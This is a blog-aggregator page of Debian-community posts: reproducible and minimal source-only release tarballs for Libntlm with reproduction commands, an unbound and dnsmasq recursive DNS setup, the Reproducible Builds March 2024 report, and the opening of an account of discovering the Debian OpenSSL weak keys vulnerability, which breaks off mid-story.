Search Results: "beh"

13 April 2024

Simon Josefsson: Reproducible and minimal source-only tarballs

With the release of Libntlm version 1.8 the release tarball can be reproduced on several distributions. We also publish a signed minimal source-only tarball, produced by git-archive which is the same format used by Savannah, Codeberg, GitLab, GitHub and others. Reproducibility of both tarballs are tested continuously for regressions on GitLab through a CI/CD pipeline. If that wasn t enough to excite you, the Debian packages of Libntlm are now built from the reproducible minimal source-only tarball. The resulting binaries are hopefully reproducible on several architectures. What does that even mean? Why should you care? How you can do the same for your project? What are the open issues? Read on, dear reader This article describes my practical experiments with reproducible release artifacts, following up on my earlier thoughts that lead to discussion on Fosstodon and a patch by Janneke Nieuwenhuizen to make Guix tarballs reproducible that inspired me to some practical work. Let s look at how a maintainer release some software, and how a user can reproduce the released artifacts from the source code. Libntlm provides a shared library written in C and uses GNU Make, GNU Autoconf, GNU Automake, GNU Libtool and gnulib for build management, but these ideas should apply to most project and build system. The following illustrate the steps a maintainer would take to prepare a release:
git clone https://gitlab.com/gsasl/libntlm.git
cd libntlm
git checkout v1.8
./bootstrap
./configure
make distcheck
gpg -b libntlm-1.8.tar.gz
The generated files libntlm-1.8.tar.gz and libntlm-1.8.tar.gz.sig are published, and users download and use them. This is how the GNU project have been doing releases since the late 1980 s. That is a testament to how successful this pattern has been! These tarballs contain source code and some generated files, typically shell scripts generated by autoconf, makefile templates generated by automake, documentation in formats like Info, HTML, or PDF. Rarely do they contain binary object code, but historically that happened. The XZUtils incident illustrate that tarballs with files that are not included in the git archive offer an opportunity to disguise malicious backdoors. I blogged earlier how to mitigate this risk by using signed minimal source-only tarballs. The risk of hiding malware is not the only motivation to publish signed minimal source-only tarballs. With pre-generated content in tarballs, there is a risk that GNU/Linux distributions such as Trisquel, Guix, Debian/Ubuntu or Fedora ship generated files coming from the tarball into the binary *.deb or *.rpm package file. Typically the person packaging the upstream project never realized that some installed artifacts was not re-built through a typical autoconf -fi && ./configure && make install sequence, and never wrote the code to rebuild everything. This can also happen if the build rules are written but are buggy, shipping the old artifact. When a security problem is found, this can lead to time-consuming situations, as it may be that patching the relevant source code and rebuilding the package is not sufficient: the vulnerable generated object from the tarball would be shipped into the binary package instead of a rebuilt artifact. For architecture-specific binaries this rarely happens, since object code is usually not included in tarballs although for 10+ years I shipped the binary Java JAR file in the GNU Libidn release tarball, until I stopped shipping it. For interpreted languages and especially for generated content such as HTML, PDF, shell scripts this happens more than you would like. Publishing minimal source-only tarballs enable easier auditing of a project s code, to avoid the need to read through all generated files looking for malicious content. I have taken care to generate the source-only minimal tarball using git-archive. This is the same format that GitLab, GitHub etc offer for the automated download links on git tags. The minimal source-only tarballs can thus serve as a way to audit GitLab and GitHub download material! Consider if/when hosting sites like GitLab or GitHub has a security incident that cause generated tarballs to include a backdoor that is not present in the git repository. If people rely on the tag download artifact without verifying the maintainer PGP signature using GnuPG, this can lead to similar backdoor scenarios that we had for XZUtils but originated with the hosting provider instead of the release manager. This is even more concerning, since this attack can be mounted for some selected IP address that you want to target and not on everyone, thereby making it harder to discover. With all that discussion and rationale out of the way, let s return to the release process. I have added another step here:
make srcdist
gpg -b libntlm-1.8-src.tar.gz
Now the release is ready. I publish these four files in the Libntlm s Savannah Download area, but they can be uploaded to a GitLab/GitHub release area as well. These are the SHA256 checksums I got after building the tarballs on my Trisquel 11 aramo laptop:
91de864224913b9493c7a6cec2890e6eded3610d34c3d983132823de348ec2ca  libntlm-1.8-src.tar.gz
ce6569a47a21173ba69c990965f73eb82d9a093eb871f935ab64ee13df47fda1  libntlm-1.8.tar.gz
So how can you reproduce my artifacts? Here is how to reproduce them in a Ubuntu 22.04 container:
podman run -it --rm ubuntu:22.04
apt-get update
apt-get install -y --no-install-recommends autoconf automake libtool make git ca-certificates
git clone https://gitlab.com/gsasl/libntlm.git
cd libntlm
git checkout v1.8
./bootstrap
./configure
make dist srcdist
sha256sum libntlm-*.tar.gz
You should see the exact same SHA256 checksum values. Hooray! This works because Trisquel 11 and Ubuntu 22.04 uses the same version of git, autoconf, automake, and libtool. These tools do not guarantee the same output content for all versions, similar to how GNU GCC does not generate the same binary output for all versions. So there is still some delicate version pairing needed. Ideally, the artifacts should be possible to reproduce from the release artifacts themselves, and not only directly from git. It is possible to reproduce the full tarball in a AlmaLinux 8 container replace almalinux:8 with rockylinux:8 if you prefer RockyLinux:
podman run -it --rm almalinux:8
dnf update -y
dnf install -y make wget gcc
wget https://download.savannah.nongnu.org/releases/libntlm/libntlm-1.8.tar.gz
tar xfa libntlm-1.8.tar.gz
cd libntlm-1.8
./configure
make dist
sha256sum libntlm-1.8.tar.gz
The source-only minimal tarball can be regenerated on Debian 11:
podman run -it --rm debian:11
apt-get update
apt-get install -y --no-install-recommends make git ca-certificates
git clone https://gitlab.com/gsasl/libntlm.git
cd libntlm
git checkout v1.8
make -f cfg.mk srcdist
sha256sum libntlm-1.8-src.tar.gz 
As the Magnus Opus or chef-d uvre, let s recreate the full tarball directly from the minimal source-only tarball on Trisquel 11 replace docker.io/kpengboy/trisquel:11.0 with ubuntu:22.04 if you prefer.
podman run -it --rm docker.io/kpengboy/trisquel:11.0
apt-get update
apt-get install -y --no-install-recommends autoconf automake libtool make wget git ca-certificates
wget https://download.savannah.nongnu.org/releases/libntlm/libntlm-1.8-src.tar.gz
tar xfa libntlm-1.8-src.tar.gz
cd libntlm-v1.8
./bootstrap
./configure
make dist
sha256sum libntlm-1.8.tar.gz
Yay! You should now have great confidence in that the release artifacts correspond to what s in version control and also to what the maintainer intended to release. Your remaining job is to audit the source code for vulnerabilities, including the source code of the dependencies used in the build. You no longer have to worry about auditing the release artifacts. I find it somewhat amusing that the build infrastructure for Libntlm is now in a significantly better place than the code itself. Libntlm is written in old C style with plenty of string manipulation and uses broken cryptographic algorithms such as MD4 and single-DES. Remember folks: solving supply chain security issues has no bearing on what kind of code you eventually run. A clean gun can still shoot you in the foot. Side note on naming: GitLab exports tarballs with pathnames libntlm-v1.8/ (i.e.., PROJECT-TAG/) and I ve adopted the same pathnames, which means my libntlm-1.8-src.tar.gz tarballs are bit-by-bit identical to GitLab s exports and you can verify this with tools like diffoscope. GitLab name the tarball libntlm-v1.8.tar.gz (i.e., PROJECT-TAG.ARCHIVE) which I find too similar to the libntlm-1.8.tar.gz that we also publish. GitHub uses the same git archive style, but unfortunately they have logic that removes the v in the pathname so you will get a tarball with pathname libntlm-1.8/ instead of libntlm-v1.8/ that GitLab and I use. The content of the tarball is bit-by-bit identical, but the pathname and archive differs. Codeberg (running Forgejo) uses another approach: the tarball is called libntlm-v1.8.tar.gz (after the tag) just like GitLab, but the pathname inside the archive is libntlm/, otherwise the produced archive is bit-by-bit identical including timestamps. Savannah s CGIT interface uses archive name libntlm-1.8.tar.gz with pathname libntlm-1.8/, but otherwise file content is identical. Savannah s GitWeb interface provides snapshot links that are named after the git commit (e.g., libntlm-a812c2ca.tar.gz with libntlm-a812c2ca/) and I cannot find any tag-based download links at all. Overall, we are so close to get SHA256 checksum to match, but fail on pathname within the archive. I ve chosen to be compatible with GitLab regarding the content of tarballs but not on archive naming. From a simplicity point of view, it would be nice if everyone used PROJECT-TAG.ARCHIVE for the archive filename and PROJECT-TAG/ for the pathname within the archive. This aspect will probably need more discussion. Side note on git archive output: It seems different versions of git archive produce different results for the same repository. The version of git in Debian 11, Trisquel 11 and Ubuntu 22.04 behave the same. The version of git in Debian 12, AlmaLinux/RockyLinux 8/9, Alpine, ArchLinux, macOS homebrew, and upcoming Ubuntu 24.04 behave in another way. Hopefully this will not change that often, but this would invalidate reproducibility of these tarballs in the future, forcing you to use an old git release to reproduce the source-only tarball. Alas, GitLab and most other sites appears to be using modern git so the download tarballs from them would not match my tarballs even though the content would. Side note on ChangeLog: ChangeLog files were traditionally manually curated files with version history for a package. In recent years, several projects moved to dynamically generate them from git history (using tools like git2cl or gitlog-to-changelog). This has consequences for reproducibility of tarballs: you need to have the entire git history available! The gitlog-to-changelog tool also output different outputs depending on the time zone of the person using it, which arguable is a simple bug that can be fixed. However this entire approach is incompatible with rebuilding the full tarball from the minimal source-only tarball. It seems Libntlm s ChangeLog file died on the surgery table here. So how would a distribution build these minimal source-only tarballs? I happen to help on the libntlm package in Debian. It has historically used the generated tarballs as the source code to build from. This means that code coming from gnulib is vendored in the tarball. When a security problem is discovered in gnulib code, the security team needs to patch all packages that include that vendored code and rebuild them, instead of merely patching the gnulib package and rebuild all packages that rely on that particular code. To change this, the Debian libntlm package needs to Build-Depends on Debian s gnulib package. But there was one problem: similar to most projects that use gnulib, Libntlm depend on a particular git commit of gnulib, and Debian only ship one commit. There is no coordination about which commit to use. I have adopted gnulib in Debian, and add a git bundle to the *_all.deb binary package so that projects that rely on gnulib can pick whatever commit they need. This allow an no-network GNULIB_URL and GNULIB_REVISION approach when running Libntlm s ./bootstrap with the Debian gnulib package installed. Otherwise libntlm would pick up whatever latest version of gnulib that Debian happened to have in the gnulib package, which is not what the Libntlm maintainer intended to be used, and can lead to all sorts of version mismatches (and consequently security problems) over time. Libntlm in Debian is developed and tested on Salsa and there is continuous integration testing of it as well, thanks to the Salsa CI team. Side note on git bundles: unfortunately there appears to be no reproducible way to export a git repository into one or more files. So one unfortunate consequence of all this work is that the gnulib *.orig.tar.gz tarball in Debian is not reproducible any more. I have tried to get Git bundles to be reproducible but I never got it to work see my notes in gnulib s debian/README.source on this aspect. Of course, source tarball reproducibility has nothing to do with binary reproducibility of gnulib in Debian itself, fortunately. One open question is how to deal with the increased build dependencies that is triggered by this approach. Some people are surprised by this but I don t see how to get around it: if you depend on source code for tools in another package to build your package, it is a bad idea to hide that dependency. We ve done it for a long time through vendored code in non-minimal tarballs. Libntlm isn t the most critical project from a bootstrapping perspective, so adding git and gnulib as Build-Depends to it will probably be fine. However, consider if this pattern was used for other packages that uses gnulib such as coreutils, gzip, tar, bison etc (all are using gnulib) then they would all Build-Depends on git and gnulib. Cross-building those packages for a new architecture will therefor require git on that architecture first, which gets circular quick. The dependency on gnulib is real so I don t see that going away, and gnulib is a Architecture:all package. However, the dependency on git is merely a consequence of how the Debian gnulib package chose to make all gnulib git commits available to projects: through a git bundle. There are other ways to do this that doesn t require the git tool to extract the necessary files, but none that I found practical ideas welcome! Finally some brief notes on how this was implementated. Enabling bootstrappable source-only minimal tarballs via gnulib s ./bootstrap is achieved by using the GNULIB_REVISION mechanism, locking down the gnulib commit used. I have always disliked git submodules because they add extra steps and has complicated interaction with CI/CD. The reason why I gave up git submodules now is because the particular commit to use is not recorded in the git archive output when git submodules is used. So the particular gnulib commit has to be mentioned explicitly in some source code that goes into the git archive tarball. Colin Watson added the GNULIB_REVISION approach to ./bootstrap back in 2018, and now it no longer made sense to continue to use a gnulib git submodule. One alternative is to use ./bootstrap with --gnulib-srcdir or --gnulib-refdir if there is some practical problem with the GNULIB_URL towards a git bundle the GNULIB_REVISION in bootstrap.conf. The srcdist make rule is simple:
git archive --prefix=libntlm-v1.8/ -o libntlm-v1.8.tar.gz HEAD
Making the make dist generated tarball reproducible can be more complicated, however for Libntlm it was sufficient to make sure the modification times of all files were set deterministically to a timestamp found in the git repository. Interestingly there seems to be a couple of different ways to accomplish this, Guix doesn t support minimal source-only tarballs but rely on a .tarball-timestamp file inside the tarball. Paul Eggert explained what TZDB is using some time ago. The approach I m using now is fairly similar to the one I suggested over a year ago. Doing continous testing of all this is critical to make sure things don t regress. Libntlm s pipeline definition now produce the generated libntlm-*.tar.gz tarballs and a checksum as a build artifact. Then I added the 000-reproducability job which compares the checksums and fails on mismatches. You can read its delicate output in the job for the v1.8 release. Right now we insists that builds on Trisquel 11 match Ubuntu 22.04, that PureOS 10 builds match Debian 11 builds, that AlmaLinux 8 builds match RockyLinux 8 builds, and AlmaLinux 9 builds match RockyLinux 9 builds. As you can see in pipeline job output, not all platforms lead to the same tarballs, but hopefully this state can be improved over time. There is also partial reproducibility, where the full tarball is reproducible across two distributions but not the minimal tarball, or vice versa. If this way of working plays out well, I hope to implement it in other projects too. What do you think? Happy Hacking!

11 April 2024

Jonathan McDowell: Sorting out backup internet #1: recursive DNS

I work from home these days, and my nearest office is over 100 miles away, 3 hours door to door if I travel by train (and, to be honest, probably not a lot faster given rush hour traffic if I drive). So I m reliant on a functional internet connection in order to be able to work. I m lucky to have access to Openreach FTTP, provided by Aquiss, but I worry about what happens if there s a cable cut somewhere or some other long lasting problem. Worst case I could tether to my work phone, or try to find some local coworking space to use while things get sorted, but I felt like arranging a backup option was a wise move. Step 1 turned out to be sorting out recursive DNS. It s been many moons since I had to deal with running DNS in a production setting, and I ve mostly done my best to avoid doing it at home too. dnsmasq has done a decent job at providing for my needs over the years, covering DHCP, DNS (+ tftp for my test device network). However I just let it slave off my ISP s nameservers, which means if that link goes down it ll no longer be able to resolve anything outside the house. One option would have been to either point to a different recursive DNS server (Cloudfare s 1.1.1.1 or Google s Public DNS being the common choices), but I ve no desire to share my lookup information with them. As another approach I could have done some sort of failover of resolv.conf when the primary network went down, but then I would have to get into moving files around based on networking status and that felt a bit clunky. So I decided to finally setup a proper local recursive DNS server, which is something I ve kinda meant to do for a while but never had sufficient reason to look into. Last time I did this I did it with BIND 9 but there are more options these days, and I decided to go with unbound, which is primarily focused on recursive DNS. One extra wrinkle, pointed out by Lars, is that having dynamic name information from DHCP hosts is exceptionally convenient. I ve kept dnsmasq as the local DHCP server, so I wanted to be able to forward local queries there. I m doing all of this on my RB5009, running Debian. Installing unbound was a simple matter of apt install unbound. I needed 2 pieces of configuration over the default, one to enable recursive serving for the house networks, and one to enable forwarding of queries for the local domain to dnsmasq. I originally had specified the wildcard address for listening, but this caused problems with the fact my router has many interfaces and would sometimes respond from a different address than the request had come in on.
/etc/unbound/unbound.conf.d/network-resolver.conf
server:
  interface: 192.0.2.1
  interface: 2001::db8:f00d::1
  access-control: 192.0.2.0/24 allow
  access-control: 2001::db8:f00d::/56 allow

/etc/unbound/unbound.conf.d/local-to-dnsmasq.conf
server:
  domain-insecure: "example.org"
  do-not-query-localhost: no
forward-zone:
  name: "example.org"
  forward-addr: 127.0.0.1@5353

I then had to configure dnsmasq to not listen on port 53 (so unbound could), respond to requests on the loopback interface (I have dnsmasq restricted to only explicitly listed interfaces), and to hand out unbound as the appropriate nameserver in DHCP requests - once dnsmasq is not listening on port 53 it no longer does this by default.
/etc/dnsmasq.d/behind-unbound
interface=lo
port=5353
dhcp-option=option6:dns-server,[2001::db8:f00d::1]
dhcp-option=option:dns-server,192.0.2.1

With these minor changes in place I now have local recursive DNS being handled by unbound, without losing dynamic local DNS for DHCP hosts. As an added bonus I now get 10/10 on Test IPv6 - previously I was getting dinged on the ability for my DNS server to resolve purely IPv6 reachable addresses. Next step, actually sorting out a backup link.

Reproducible Builds: Reproducible Builds in March 2024

Welcome to the March 2024 report from the Reproducible Builds project! In our reports, we attempt to outline what we have been up to over the past month, as well as mentioning some of the important things happening more generally in software supply-chain security. As ever, if you are interested in contributing to the project, please visit our Contribute page on our website. Table of contents:
  1. Arch Linux minimal container userland now 100% reproducible
  2. Validating Debian s build infrastructure after the XZ backdoor
  3. Making Fedora Linux (more) reproducible
  4. Increasing Trust in the Open Source Supply Chain with Reproducible Builds and Functional Package Management
  5. Software and source code identification with GNU Guix and reproducible builds
  6. Two new Rust-based tools for post-processing determinism
  7. Distribution work
  8. Mailing list highlights
  9. Website updates
  10. Delta chat clients now reproducible
  11. diffoscope updates
  12. Upstream patches
  13. Reproducibility testing framework

Arch Linux minimal container userland now 100% reproducible In remarkable news, Reproducible builds developer kpcyrd reported that that the Arch Linux minimal container userland is now 100% reproducible after work by developers dvzv and Foxboron on the one remaining package. This represents a real world , widely-used Linux distribution being reproducible. Their post, which kpcyrd suffixed with the question now what? , continues on to outline some potential next steps, including validating whether the container image itself could be reproduced bit-for-bit. The post, which was itself a followup for an Arch Linux update earlier in the month, generated a significant number of replies.

Validating Debian s build infrastructure after the XZ backdoor From our mailing list this month, Vagrant Cascadian wrote about being asked about trying to perform concrete reproducibility checks for recent Debian security updates, in an attempt to gain some confidence about Debian s build infrastructure given that they performed builds in environments running the high-profile XZ vulnerability. Vagrant reports (with some caveats):
So far, I have not found any reproducibility issues; everything I tested I was able to get to build bit-for-bit identical with what is in the Debian archive.
That is to say, reproducibility testing permitted Vagrant and Debian to claim with some confidence that builds performed when this vulnerable version of XZ was installed were not interfered with.

Making Fedora Linux (more) reproducible In March, Davide Cavalca gave a talk at the 2024 Southern California Linux Expo (aka SCALE 21x) about the ongoing effort to make the Fedora Linux distribution reproducible. Documented in more detail on Fedora s website, the talk touched on topics such as the specifics of implementing reproducible builds in Fedora, the challenges encountered, the current status and what s coming next. (YouTube video)

Increasing Trust in the Open Source Supply Chain with Reproducible Builds and Functional Package Management Julien Malka published a brief but interesting paper in the HAL open archive on Increasing Trust in the Open Source Supply Chain with Reproducible Builds and Functional Package Management:
Functional package managers (FPMs) and reproducible builds (R-B) are technologies and methodologies that are conceptually very different from the traditional software deployment model, and that have promising properties for software supply chain security. This thesis aims to evaluate the impact of FPMs and R-B on the security of the software supply chain and propose improvements to the FPM model to further improve trust in the open source supply chain. PDF
Julien s paper poses a number of research questions on how the model of distributions such as GNU Guix and NixOS can be leveraged to further improve the safety of the software supply chain , etc.

Software and source code identification with GNU Guix and reproducible builds In a long line of commendably detailed blog posts, Ludovic Court s, Maxim Cournoyer, Jan Nieuwenhuizen and Simon Tournier have together published two interesting posts on the GNU Guix blog this month. In early March, Ludovic Court s, Maxim Cournoyer, Jan Nieuwenhuizen and Simon Tournier wrote about software and source code identification and how that might be performed using Guix, rhetorically posing the questions: What does it take to identify software ? How can we tell what software is running on a machine to determine, for example, what security vulnerabilities might affect it? Later in the month, Ludovic Court s wrote a solo post describing adventures on the quest for long-term reproducible deployment. Ludovic s post touches on GNU Guix s aim to support time travel , the ability to reliably (and reproducibly) revert to an earlier point in time, employing the iconic image of Harold Lloyd hanging off the clock in Safety Last! (1925) to poetically illustrate both the slapstick nature of current modern technology and the gymnastics required to navigate hazards of our own making.

Two new Rust-based tools for post-processing determinism Zbigniew J drzejewski-Szmek announced add-determinism, a work-in-progress reimplementation of the Reproducible Builds project s own strip-nondeterminism tool in the Rust programming language, intended to be used as a post-processor in RPM-based distributions such as Fedora In addition, Yossi Kreinin published a blog post titled refix: fast, debuggable, reproducible builds that describes a tool that post-processes binaries in such a way that they are still debuggable with gdb, etc.. Yossi post details the motivation and techniques behind the (fast) performance of the tool.

Distribution work In Debian this month, since the testing framework no longer varies the build path, James Addison performed a bulk downgrade of the bug severity for issues filed with a level of normal to a new level of wishlist. In addition, 28 reviews of Debian packages were added, 38 were updated and 23 were removed this month adding to ever-growing knowledge about identified issues. As part of this effort, a number of issue types were updated, including Chris Lamb adding a new ocaml_include_directories toolchain issue [ ] and James Addison adding a new filesystem_order_in_java_jar_manifest_mf_include_resource issue [ ] and updating the random_uuid_in_notebooks_generated_by_nbsphinx to reference a relevant discussion thread [ ]. In addition, Roland Clobus posted his 24th status update of reproducible Debian ISO images. Roland highlights that the images for Debian unstable often cannot be generated due to changes in that distribution related to the 64-bit time_t transition. Lastly, Bernhard M. Wiedemann posted another monthly update for his reproducibility work in openSUSE.

Mailing list highlights Elsewhere on our mailing list this month:

Website updates There were made a number of improvements to our website this month, including:
  • Pol Dellaiera noticed the frequent need to correctly cite the website itself in academic work. To facilitate easier citation across multiple formats, Pol contributed a Citation File Format (CIF) file. As a result, an export in BibTeX format is now available in the Academic Publications section. Pol encourages community contributions to further refine the CITATION.cff file. Pol also added an substantial new section to the buy in page documenting the role of Software Bill of Materials (SBOMs) and ephemeral development environments. [ ][ ]
  • Bernhard M. Wiedemann added a new commandments page to the documentation [ ][ ] and fixed some incorrect YAML elsewhere on the site [ ].
  • Chris Lamb add three recent academic papers to the publications page of the website. [ ]
  • Mattia Rizzolo and Holger Levsen collaborated to add Infomaniak as a sponsor of amd64 virtual machines. [ ][ ][ ]
  • Roland Clobus updated the stable outputs page, dropping version numbers from Python documentation pages [ ] and noting that Python s set data structure is also affected by the PYTHONHASHSEED functionality. [ ]

Delta chat clients now reproducible Delta Chat, an open source messaging application that can work over email, announced this month that the Rust-based core library underlying Delta chat application is now reproducible.

diffoscope diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions 259, 260 and 261 to Debian and made the following additional changes:
  • New features:
    • Add support for the zipdetails tool from the Perl distribution. Thanks to Fay Stegerman and Larry Doolittle et al. for the pointer and thread about this tool. [ ]
  • Bug fixes:
    • Don t identify Redis database dumps as GNU R database files based simply on their filename. [ ]
    • Add a missing call to File.recognizes so we actually perform the filename check for GNU R data files. [ ]
    • Don t crash if we encounter an .rdb file without an equivalent .rdx file. (#1066991)
    • Correctly check for 7z being available and not lz4 when testing 7z. [ ]
    • Prevent a traceback when comparing a contentful .pyc file with an empty one. [ ]
  • Testsuite improvements:
    • Fix .epub tests after supporting the new zipdetails tool. [ ]
    • Don t use parenthesis within test skipping messages, as PyTest adds its own parenthesis. [ ]
    • Factor out Python version checking in test_zip.py. [ ]
    • Skip some Zip-related tests under Python 3.10.14, as a potential regression may have been backported to the 3.10.x series. [ ]
    • Actually test 7z support in the test_7z set of tests, not the lz4 functionality. (Closes: reproducible-builds/diffoscope#359). [ ]
In addition, Fay Stegerman updated diffoscope s monkey patch for supporting the unusual Mozilla ZIP file format after Python s zipfile module changed to detect potentially insecure overlapping entries within .zip files. (#362) Chris Lamb also updated the trydiffoscope command line client, dropping a build-dependency on the deprecated python3-distutils package to fix Debian bug #1065988 [ ], taking a moment to also refresh the packaging to the latest Debian standards [ ]. Finally, Vagrant Cascadian submitted an update for diffoscope version 260 in GNU Guix. [ ]

Upstream patches This month, we wrote a large number of patches, including: Bernhard M. Wiedemann used reproducibility-tooling to detect and fix packages that added changes in their %check section, thus failing when built with the --no-checks option. Only half of all openSUSE packages were tested so far, but a large number of bugs were filed, including ones against caddy, exiv2, gnome-disk-utility, grisbi, gsl, itinerary, kosmindoormap, libQuotient, med-tools, plasma6-disks, pspp, python-pypuppetdb, python-urlextract, rsync, vagrant-libvirt and xsimd. Similarly, Jean-Pierre De Jesus DIAZ employed reproducible builds techniques in order to test a proposed refactor of the ath9k-htc-firmware package. As the change produced bit-for-bit identical binaries to the previously shipped pre-built binaries:
I don t have the hardware to test this firmware, but the build produces the same hashes for the firmware so it s safe to say that the firmware should keep working.

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In March, an enormous number of changes were made by Holger Levsen:
  • Debian-related changes:
    • Sleep less after a so-called 404 package state has occurred. [ ]
    • Schedule package builds more often. [ ][ ]
    • Regenerate all our HTML indexes every hour, but only every 12h for the released suites. [ ]
    • Create and update unstable and experimental base systems on armhf again. [ ][ ]
    • Don t reschedule so many depwait packages due to the current size of the i386 architecture queue. [ ]
    • Redefine our scheduling thresholds and amounts. [ ]
    • Schedule untested packages with a higher priority, otherwise slow architectures cannot keep up with the experimental distribution growing. [ ]
    • Only create the stats_buildinfo.png graph once per day. [ ][ ]
    • Reproducible Debian dashboard: refactoring, update several more static stats only every 12h. [ ]
    • Document how to use systemctl with new systemd-based services. [ ]
    • Temporarily disable armhf and i386 continuous integration tests in order to get some stability back. [ ]
    • Use the deb.debian.org CDN everywhere. [ ]
    • Remove the rsyslog logging facility on bookworm systems. [ ]
    • Add zst to the list of packages which are false-positive diskspace issues. [ ]
    • Detect failures to bootstrap Debian base systems. [ ]
  • Arch Linux-related changes:
    • Temporarily disable builds because the pacman package manager is broken. [ ][ ]
    • Split reproducible_html_live_status and split the scheduling timing . [ ][ ][ ]
    • Improve handling when database is locked. [ ][ ]
  • Misc changes:
    • Show failed services that require manual cleanup. [ ][ ]
    • Integrate two new Infomaniak nodes. [ ][ ][ ][ ]
    • Improve IRC notifications for artifacts. [ ]
    • Run diffoscope in different systemd slices. [ ]
    • Run the node health check more often, as it can now repair some issues. [ ][ ]
    • Also include the string Bot in the userAgent for Git. (Re: #929013). [ ]
    • Document increased tmpfs size on our OUSL nodes. [ ]
    • Disable memory account for the reproducible_build service. [ ][ ]
    • Allow 10 times as many open files for the Jenkins service. [ ]
    • Set OOMPolicy=continue and OOMScoreAdjust=-1000 for both the Jenkins and the reproducible_build service. [ ]
Mattia Rizzolo also made the following changes:
  • Debian-related changes:
    • Define a systemd slice to group all relevant services. [ ][ ]
    • Add a bunch of quotes in scripts to assuage the shellcheck tool. [ ]
    • Add stats on how many packages have been built today so far. [ ]
    • Instruct systemd-run to handle diffoscope s exit codes specially. [ ]
    • Prefer the pgrep tool over grepping the output of ps. [ ]
    • Re-enable a couple of i386 and armhf architecture builders. [ ][ ]
    • Fix some stylistic issues flagged by the Python flake8 tool. [ ]
    • Cease scheduling Debian unstable and experimental on the armhf architecture due to the time_t transition. [ ]
    • Start a few more i386 & armhf workers. [ ][ ][ ]
    • Temporarly skip pbuilder updates in the unstable distribution, but only on the armhf architecture. [ ]
  • Other changes:
    • Perform some large-scale refactoring on how the systemd service operates. [ ][ ]
    • Move the list of workers into a separate file so it s accessible to a number of scripts. [ ]
    • Refactor the powercycle_x86_nodes.py script to use the new IONOS API and its new Python bindings. [ ]
    • Also fix nph-logwatch after the worker changes. [ ]
    • Do not install the stunnel tool anymore, it shouldn t be needed by anything anymore. [ ]
    • Move temporary directories related to Arch Linux into a single directory for clarity. [ ]
    • Update the arm64 architecture host keys. [ ]
    • Use a common Postfix configuration. [ ]
The following changes were also made by:
  • Jan-Benedict Glaw:
    • Initial work to clean up a messy NetBSD-related script. [ ][ ]
  • Roland Clobus:
    • Show the installer log if the installer fails to build. [ ]
    • Avoid the minus character (i.e. -) in a variable in order to allow for tags in openQA. [ ]
    • Update the schedule of Debian live image builds. [ ]
  • Vagrant Cascadian:
    • Maintenance on the virt* nodes is completed so bring them back online. [ ]
    • Use the fully qualified domain name in configuration. [ ]
Node maintenance was also performed by Holger Levsen, Mattia Rizzolo [ ][ ] and Vagrant Cascadian [ ][ ][ ][ ]

If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

9 April 2024

Matthew Palmer: How I Tripped Over the Debian Weak Keys Vulnerability

Those of you who haven t been in IT for far, far too long might not know that next month will be the 16th(!) anniversary of the disclosure of what was, at the time, a fairly earth-shattering revelation: that for about 18 months, the Debian OpenSSL package was generating entirely predictable private keys. The recent xz-stential threat (thanks to @nixCraft for making me aware of that one), has got me thinking about my own serendipitous interaction with a major vulnerability. Given that the statute of limitations has (probably) run out, I thought I d share it as a tale of how huh, that s weird can be a powerful threat-hunting tool but only if you ve got the time to keep pulling at the thread.

Prelude to an Adventure Our story begins back in March 2008. I was working at Engine Yard (EY), a now largely-forgotten Rails-focused hosting company, which pioneered several advances in Rails application deployment. Probably EY s greatest claim to lasting fame is that they helped launch a little code hosting platform you might have heard of, by providing them free infrastructure when they were little more than a glimmer in the Internet s eye. I am, of course, talking about everyone s favourite Microsoft product: GitHub. Since GitHub was in the right place, at the right time, with a compelling product offering, they quickly started to gain traction, and grow their userbase. With growth comes challenges, amongst them the one we re focusing on today: SSH login times. Then, as now, GitHub provided SSH access to the git repos they hosted, by SSHing to git@github.com with publickey authentication. They were using the standard way that everyone manages SSH keys: the ~/.ssh/authorized_keys file, and that became a problem as the number of keys started to grow. The way that SSH uses this file is that, when a user connects and asks for publickey authentication, SSH opens the ~/.ssh/authorized_keys file and scans all of the keys listed in it, looking for a key which matches the key that the user presented. This linear search is normally not a huge problem, because nobody in their right mind puts more than a few keys in their ~/.ssh/authorized_keys, right?
2008-era GitHub giving monkey puppet side-eye to the idea that nobody stores many keys in an authorized_keys file
Of course, as a popular, rapidly-growing service, GitHub was gaining users at a fair clip, to the point that the one big file that stored all the SSH keys was starting to visibly impact SSH login times. This problem was also not going to get any better by itself. Something Had To Be Done. EY management was keen on making sure GitHub ran well, and so despite it not really being a hosting problem, they were willing to help fix this problem. For some reason, the late, great, Ezra Zygmuntowitz pointed GitHub in my direction, and let me take the time to really get into the problem with the GitHub team. After examining a variety of different possible solutions, we came to the conclusion that the least-worst option was to patch OpenSSH to lookup keys in a MySQL database, indexed on the key fingerprint. We didn t take this decision on a whim it wasn t a case of yeah, sure, let s just hack around with OpenSSH, what could possibly go wrong? . We knew it was potentially catastrophic if things went sideways, so you can imagine how much worse the other options available were. Ensuring that this wouldn t compromise security was a lot of the effort that went into the change. In the end, though, we rolled it out in early April, and lo! SSH logins were fast, and we were pretty sure we wouldn t have to worry about this problem for a long time to come. Normally, you d think patching OpenSSH to make mass SSH logins super fast would be a good story on its own. But no, this is just the opening scene.

Chekov s Gun Makes its Appearance Fast forward a little under a month, to the first few days of May 2008. I get a message from one of the GitHub team, saying that somehow users were able to access other users repos over SSH. Naturally, as we d recently rolled out the OpenSSH patch, which touched this very thing, the code I d written was suspect number one, so I was called in to help.
The lineup scene from the movie The Usual Suspects They're called The Usual Suspects for a reason, but sometimes, it really is Keyser S ze
Eventually, after more than a little debugging, we discovered that, somehow, there were two users with keys that had the same key fingerprint. This absolutely shouldn t happen it s a bit like winning the lottery twice in a row1 unless the users had somehow shared their keys with each other, of course. Still, it was worth investigating, just in case it was a web application bug, so the GitHub team reached out to the users impacted, to try and figure out what was going on. The users professed no knowledge of each other, neither admitted to publicising their key, and couldn t offer any explanation as to how the other person could possibly have gotten their key. Then things went from weird to what the ? . Because another pair of users showed up, sharing a key fingerprint but it was a different shared key fingerprint. The odds now have gone from winning the lottery multiple times in a row to as close to this literally cannot happen as makes no difference.
Milhouse from The Simpsons says that We're Through The Looking Glass Here, People
